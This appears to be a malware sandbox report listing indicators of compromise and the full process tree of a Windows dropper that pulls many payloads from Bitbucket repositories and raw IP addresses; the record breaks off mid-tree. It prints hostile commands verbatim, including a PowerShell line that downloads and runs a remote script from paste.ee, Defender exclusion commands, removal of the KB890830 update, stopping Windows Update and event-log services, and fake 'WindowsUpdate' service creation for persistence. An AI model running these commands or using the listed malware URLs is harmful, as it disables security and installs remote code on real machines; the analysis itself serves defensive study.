1628	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
1628	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
1628	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
1628	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
1628	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
1628	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
1628	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
1628	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
1628	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
1628	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
5072	Updater.exe
1968	powershell.exe
1968	powershell.exe
5072	Updater.exe
5072	Updater.exe
5072	Updater.exe
5072	Updater.exe
5072	Updater.exe
5072	Updater.exe
5072	Updater.exe
5072	Updater.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
2488	svchost.exe
1092	httpbitbucket.orgnhbghnj1kjhi1adownloadsNewApp.exe.exe
2472	powershell.exe
2472	powershell.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

description	pid	Process
Token: SeDebugPrivilege	4284	Setup.exe(1).exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	4076	powershell.exe
Token: SeDebugPrivilege	2728	httpbitbucket.orgkcatelinjamesondownloadseasyfirewall.exe.exe
Token: SeDebugPrivilege	2196	powershell.exe
Token: SeDebugPrivilege	1628	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	5072	Updater.exe
Token: SeLockMemoryPrivilege	2488	svchost.exe
Token: SeDebugPrivilege	4576	MSBuild.exe
Token: SeBackupPrivilege	4576	MSBuild.exe
Token: SeSecurityPrivilege	4576	MSBuild.exe
Token: SeSecurityPrivilege	4576	MSBuild.exe
Token: SeSecurityPrivilege	4576	MSBuild.exe
Token: SeSecurityPrivilege	4576	MSBuild.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeShutdownPrivilege	3764	powercfg.exe
Token: SeCreatePagefilePrivilege	3764	powercfg.exe
Token: SeShutdownPrivilege	4136	powercfg.exe
Token: SeCreatePagefilePrivilege	4136	powercfg.exe
Token: SeShutdownPrivilege	216	powercfg.exe
Token: SeCreatePagefilePrivilege	216	powercfg.exe
Token: SeShutdownPrivilege	2268	powercfg.exe
Token: SeCreatePagefilePrivilege	2268	powercfg.exe
Token: SeDebugPrivilege	4204	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4284 wrote to memory of 2724	4284	Setup.exe(1).exe	99
PID 4284 wrote to memory of 2724	4284	Setup.exe(1).exe	99
PID 4284 wrote to memory of 2724	4284	Setup.exe(1).exe	99
PID 4284 wrote to memory of 3512	4284	Setup.exe(1).exe	100
PID 4284 wrote to memory of 3512	4284	Setup.exe(1).exe	100
PID 4284 wrote to memory of 3512	4284	Setup.exe(1).exe	100
PID 3512 wrote to memory of 1760	3512	httptwizt.netnewtpp.exe.exe	101
PID 3512 wrote to memory of 1760	3512	httptwizt.netnewtpp.exe.exe	101
PID 3512 wrote to memory of 1760	3512	httptwizt.netnewtpp.exe.exe	101
PID 2724 wrote to memory of 2120	2724	http185.215.113.66pei.exe.exe	103
PID 2724 wrote to memory of 2120	2724	http185.215.113.66pei.exe.exe	103
PID 2724 wrote to memory of 2120	2724	http185.215.113.66pei.exe.exe	103
PID 1760 wrote to memory of 1484	1760	sysppvrdnvs.exe	104
PID 1760 wrote to memory of 1484	1760	sysppvrdnvs.exe	104
PID 1760 wrote to memory of 1484	1760	sysppvrdnvs.exe	104
PID 1760 wrote to memory of 1292	1760	sysppvrdnvs.exe	106
PID 1760 wrote to memory of 1292	1760	sysppvrdnvs.exe	106
PID 1760 wrote to memory of 1292	1760	sysppvrdnvs.exe	106
PID 1484 wrote to memory of 2792	1484	cmd.exe	108
PID 1484 wrote to memory of 2792	1484	cmd.exe	108
PID 1484 wrote to memory of 2792	1484	cmd.exe	108
PID 1292 wrote to memory of 2304	1292	cmd.exe	109
PID 1292 wrote to memory of 2304	1292	cmd.exe	109
PID 1292 wrote to memory of 2304	1292	cmd.exe	109
PID 1292 wrote to memory of 5052	1292	cmd.exe	110
PID 1292 wrote to memory of 5052	1292	cmd.exe	110
PID 1292 wrote to memory of 5052	1292	cmd.exe	110
PID 1292 wrote to memory of 940	1292	cmd.exe	111
PID 1292 wrote to memory of 940	1292	cmd.exe	111
PID 1292 wrote to memory of 940	1292	cmd.exe	111
PID 1292 wrote to memory of 2236	1292	cmd.exe	112
PID 1292 wrote to memory of 2236	1292	cmd.exe	112
PID 1292 wrote to memory of 2236	1292	cmd.exe	112
PID 1292 wrote to memory of 3800	1292	cmd.exe	113
PID 1292 wrote to memory of 3800	1292	cmd.exe	113
PID 1292 wrote to memory of 3800	1292	cmd.exe	113
PID 4284 wrote to memory of 1152	4284	Setup.exe(1).exe	114
PID 4284 wrote to memory of 1152	4284	Setup.exe(1).exe	114
PID 1152 wrote to memory of 4884	1152	http31.41.244.11filesEDge.exe.exe	115
PID 1152 wrote to memory of 4884	1152	http31.41.244.11filesEDge.exe.exe	115
PID 4284 wrote to memory of 4396	4284	Setup.exe(1).exe	117
PID 4284 wrote to memory of 4396	4284	Setup.exe(1).exe	117
PID 4284 wrote to memory of 4396	4284	Setup.exe(1).exe	117
PID 4284 wrote to memory of 5092	4284	Setup.exe(1).exe	122
PID 4284 wrote to memory of 5092	4284	Setup.exe(1).exe	122
PID 4284 wrote to memory of 5092	4284	Setup.exe(1).exe	122
PID 4284 wrote to memory of 516	4284	Setup.exe(1).exe	123
PID 4284 wrote to memory of 516	4284	Setup.exe(1).exe	123
PID 4284 wrote to memory of 516	4284	Setup.exe(1).exe	123
PID 4284 wrote to memory of 1160	4284	Setup.exe(1).exe	124
PID 4284 wrote to memory of 1160	4284	Setup.exe(1).exe	124
PID 4284 wrote to memory of 1160	4284	Setup.exe(1).exe	124
PID 516 wrote to memory of 4516	516	httpsdewatabalirental.com3.exe.exe	130
PID 516 wrote to memory of 4516	516	httpsdewatabalirental.com3.exe.exe	130
PID 516 wrote to memory of 4516	516	httpsdewatabalirental.com3.exe.exe	130
PID 516 wrote to memory of 4516	516	httpsdewatabalirental.com3.exe.exe	130
PID 516 wrote to memory of 4516	516	httpsdewatabalirental.com3.exe.exe	130
PID 516 wrote to memory of 4516	516	httpsdewatabalirental.com3.exe.exe	130
PID 516 wrote to memory of 4516	516	httpsdewatabalirental.com3.exe.exe	130
PID 516 wrote to memory of 4516	516	httpsdewatabalirental.com3.exe.exe	130
PID 516 wrote to memory of 4516	516	httpsdewatabalirental.com3.exe.exe	130
PID 516 wrote to memory of 4516	516	httpsdewatabalirental.com3.exe.exe	130
PID 4516 wrote to memory of 4076	4516	BitLockerToGo.exe	133
PID 4516 wrote to memory of 4076	4516	BitLockerToGo.exe	133

C:\Users\Admin\AppData\Local\Temp\Setup.exe(1).exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe(1).exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4284
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2724
- - C:\Users\Admin\AppData\Local\Temp\1734422768.exe
    C:\Users\Admin\AppData\Local\Temp\1734422768.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2120
- C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3512
- - C:\Windows\sysppvrdnvs.exe
    C:\Windows\sysppvrdnvs.exe
    3⤵
    - Modifies security service
    - Windows security bypass
    - Checks computer location settings
    - Executes dropped EXE
    - Windows security modification
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1760
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1484
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2792
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1292
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2304
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5052
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:940
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2236
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3800
- C:\Users\Admin\AppData\Local\Temp\http31.41.244.11filesEDge.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http31.41.244.11filesEDge.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1152
- - C:\Users\Admin\AppData\Roaming\Edge\Edge.exe
    "C:\Users\Admin\AppData\Roaming\Edge\Edge.exe" {6B387F7B-F5A9-4597-ABB2-EB1AC679F320}
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    PID:4884
- C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com2.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com2.exe.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:4396
- C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com1.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com1.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:5092
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1392
    3⤵
    - Program crash
    PID:216
- C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com3.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com3.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:516
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4516
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4076
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1516
- C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com4.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com4.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1160
- C:\Users\Admin\AppData\Local\Temp\httpsbitbucket.orgsolgoodmanzixenbergdownloadsBybit.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsbitbucket.orgsolgoodmanzixenbergdownloadsBybit.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:3640
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1216
- C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgjamesom1942wiskeydownloadsSet-up.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgjamesom1942wiskeydownloadsSet-up.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:2928
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:464
- C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgchermander20sonicwawedownloadsbybit.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgchermander20sonicwawedownloadsbybit.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:1620
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:880
- C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgchermander20sonicwawedownloadsRmMai.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgchermander20sonicwawedownloadsRmMai.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:4584
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3600
- C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgkcatelinjamesondownloadseasyfirewall.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgkcatelinjamesondownloadseasyfirewall.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2728
- C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
  "C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1628
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1560
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:5092
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4220
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2832
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:116
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:3772
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:2024
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "WindowsUpdate"
    3⤵
    - Launches sc.exe
    PID:1920
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "WindowsUpdate" binpath= "C:\ProgramData\Windows11\Updater.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:4904
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:640
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "WindowsUpdate"
    3⤵
    - Launches sc.exe
    PID:2928
- C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgnhbghnj1kjhi1adownloadsNewApp.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgnhbghnj1kjhi1adownloadsNewApp.exe.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:1092
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3052
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:3636
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1200
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4764
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2248
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:2552
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:4816
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3764
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4136
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:216
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2268
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
    3⤵
    - Launches sc.exe
    PID:4048
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:2292
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:2844
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
    3⤵
    - Launches sc.exe
    PID:1908
- C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgprogrammerbfhsoftbfhdownloadssdadsasad.png.exe
  "C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgprogrammerbfhsoftbfhdownloadssdadsasad.png.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:1920
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4576
- C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgnhbghnj1kjhi1adownloadsUpdater.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgnhbghnj1kjhi1adownloadsUpdater.exe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4068
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4048
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:3776
- C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgkcatelinjamesondownloadsSoftShipment.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgkcatelinjamesondownloadsSoftShipment.exe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:2192
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c move Killing Killing.bat & Killing.bat
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5092
- C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgkcatelinjamesondownloadsGoogle_Chrome.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgkcatelinjamesondownloadsGoogle_Chrome.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:2408
- C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgprogrammerbfhsoftbfhdownloadsUpdatemmmm.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgprogrammerbfhsoftbfhdownloadsUpdatemmmm.exe.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:3608
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:4960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:812
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:1588
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1308
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3764
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2800
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:540
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:2024
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:2292
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "WindowsUpdate"
    3⤵
    - Launches sc.exe
    PID:1704
- C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgdlo2adownloadsin.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgdlo2adownloadsin.exe.exe"
  2⤵
  PID:1980
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy Chinese Chinese.bat & Chinese.bat
    3⤵
    PID:2800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5092 -ip 5092
1⤵
PID:3452

C:\ProgramData\Windows11\Updater.exe
C:\ProgramData\Windows11\Updater.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5072
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:264
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:540
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4068
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:3928
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1256
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:3776
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2632
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1640
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2488

C:\ProgramData\GoogleUP\Chrome\Updater.exe
C:\ProgramData\GoogleUP\Chrome\Updater.exe
1⤵
- Executes dropped EXE
PID:4984
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4204
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:1924
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2504
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:712
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2784
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
